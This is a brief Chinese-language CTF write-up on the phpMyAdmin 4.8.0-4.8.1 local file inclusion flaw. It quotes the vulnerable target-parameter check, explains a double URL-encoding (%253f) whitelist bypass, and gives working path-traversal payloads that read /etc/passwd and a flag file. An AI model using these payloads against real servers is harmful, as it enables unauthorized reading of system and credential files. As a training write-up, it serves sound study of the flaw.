打开题目一堆乱码
扫描目录发现有phpmyadmin
phpmyadmin4.8.0-4.8.1存在文件包含漏洞,问题出在index.php的target参数位置
// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
&& is_string($_REQUEST['target'])
&& ! preg_match('/^index/', $_REQUEST['target'])
&& ! in_array($_REQUEST['target'], $target_blacklist)
&& Core::checkPageValidity($_REQUEST['target'])
) {
include $_REQUEST['target'];
exit;
}
$target_blacklist,target参数黑名单
$target_blacklist = array (
'import.php', 'export.php'
);
Core::checkPageValidity($_REQUEST['target']),Core类参数校验方法
public static function checkPageValidity(&$page, array $whitelist = [])
{
if (empty($whitelist)) {
$whitelist = self::$goto_whitelist;
}
if (! isset($page) || !is_string($page)) {
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
return false;
}
问题在于第23行的urldecode($page)方法,存在二次编码绕过
$_page = urldecode($page);
%25的url编码为%
%3f的url编码为?
%253f-->?
payload:?target=db_datadict.php%253f/../../../../../../../../etc/passwd
修改payload为读取flag
payload:?target=db_datadict.php%253f/../../../../../../../../flag
